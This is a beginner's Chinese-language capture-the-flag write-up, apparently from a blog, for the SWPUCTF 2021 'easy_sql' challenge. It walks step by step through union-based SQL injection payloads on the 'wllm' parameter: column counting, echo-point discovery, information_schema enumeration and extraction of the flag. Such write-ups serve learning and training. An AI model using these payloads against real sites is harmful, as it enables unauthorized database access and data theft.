[SWPUCTF 2021 新生赛]easy_sql

转web之后第一次做sql,还不是很懂。

打开题目所给的环境之后能看到:

 这里我们查看源代码发现参数是wllm,我们这里构造路径对它进行单引号测试:

?wllm=1'

这里我发现得到了一个错误的sql注入的回显 ,因为是自己第一次写sql类的题目嘛,然后去进行了相关的搜索,这里我看的是:

SQL注入基础入门篇 注入思路及常见的SQL注入类型总结_sql注入字典csdn-CSDN博客

这个文章讲的东西基本可以够我去理解一些基本的思路和做法,然后文章里面还附带了一些基本的演示。

然后我这里直接就是照着那个文章的思路去写的题目。

首先先判断字段:

?wllm=-1' order by 3--+

这里可以得到:

 

这里得到字段有三行,接着查找 回显点:

?wllm=-1' union select 1,2,3--+

 

 然后根据回显点查找库名:

?wllm=-1' union select 1,2,database()--+

 

然后查询表名:

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+ 

 

接着查询字段名:

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+ 

 

这里就有了我们要找的flag,所以我们这里直接查询test_tb表得到我们想要的数据 :

?wllm=-1' union select 1,2,flag from test_tb --+

 

然后就得到了flag。 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值